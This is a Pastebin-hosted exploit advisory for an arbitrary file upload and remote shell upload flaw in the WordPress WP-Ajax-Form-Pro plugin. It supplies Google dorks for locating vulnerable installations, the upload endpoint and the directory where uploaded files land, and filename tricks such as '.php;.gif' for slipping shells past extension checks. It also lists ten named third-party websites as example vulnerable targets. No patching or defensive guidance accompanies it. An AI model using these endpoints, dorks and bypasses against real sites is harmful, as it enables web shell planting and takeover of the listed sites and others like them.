Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress WP-Ajax-Form-Pro Plugins 5.0.2 Remote Shell Upload Vulnerability
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 22/12/2018
- # Vendor Homepage : wordpress.org ~ ajaxformpro.com
- # Software Download Link : ajaxformpro.com
- # Software Script Owner and Developer : Gabriel Livan
- # Software Price : 19$ ~ 39$ ~ 89$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 4.9.9 and 5.0.2
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/wp-ajax-form-pro/''
- + intext:''PRISMATIBRO, SWEDEN''
- + intext:''2015 MSSNRI | Membership Site | MSS Nurses Registry, Inc.''
- + intext:''Site by ECI!''
- + intext:''© 2006 - 2018 Shaw IT Services''
- + intext:''Historic Rentals Blog Homepage. This blog is powered by WordPress.''
- + intext:''Copyright 2014 - AJAX Form Pro - All Rights Reserved''
- + intext:''Powered by OptimizePress 2.0''
- + intext:''Powered by PIGO Multimedia, Inc.''
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- + CWE-434 - [ Unrestricted Upload of File with Dangerous Type ]
- #################################################################################################
- # Admin Panel Login Path :
- /wp-login.php
- # Arbitrary File Upload/Remote Shell Upload Exploit :
- /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- # Directory File Path :
- /wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/uploads/......
- # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg ~ jpg ~ gif ~ png ~ docx ~ pdf
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] ajaxformpro.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] prismatibro.se/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] mssregistryinc.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] shadowbrooktchoa.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] peachtreebennett.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] mretec.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] vipbraids.com/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] dbwiztech.com/quickl/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] shawitservices.com.au/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- [+] historicrentals.com/wordpress/wp-content/plugins/wp-ajax-form-pro/ajax-form-app/uploader/do.upload.php?form_id=afp
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement